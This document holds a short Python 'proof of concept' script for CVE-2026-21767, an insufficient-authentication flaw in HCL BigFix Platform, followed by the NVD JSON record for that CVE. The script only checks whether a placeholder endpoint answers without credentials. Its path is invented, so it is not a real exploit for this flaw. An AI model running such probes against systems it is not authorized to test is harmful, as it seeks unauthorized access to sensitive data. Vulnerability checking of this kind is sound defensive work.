CVE-2026-21767

# CVE-2026-21767 PoC Concept (HCL BigFix Platform Insufficient Authentication) # Description: This script attempts to access a sensitive endpoint without authentication. import requests import sys def check_vulnerability(target_url): # Example sensitive endpoint that should require authentication # Replace with actual vulnerable endpoint path based on vendor advisory sensitive_path = "/api/sensitive/configuration" full_url = f"{target_url}{sensitive_path}" print(f"[*] Attempting to access: {full_url}") try: # Send request without any authentication headers or cookies response = requests.get(full_url, timeout=10) if response.status_code == 200: print("[+] Potential vulnerability detected!") print("[+] Server responded with 200 OK without authentication.") print(f"[+] Response snippet: {response.text[:200]}") elif response.status_code == 401 or response.status_code == 403: print("[-] Access denied. Authentication is working properly.") else: print(f"[?] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <http://target_ip:port>") else: check_vulnerability(sys.argv[1])

{"cve": {"id": "CVE-2026-21767", "sourceIdentifier": "[email protected]", "published": "2026-04-02T00:16:24.147", "lastModified": "2026-04-16T16:05:38.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Platform is affected by insufficient authentication.  The application might allow users to access sensitive areas of the application without proper authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndIncluding": "11.0.5", "matchCriteriaId": "655B6D28-5486-4ACF-B28F-7346BFB377D0"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129906", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}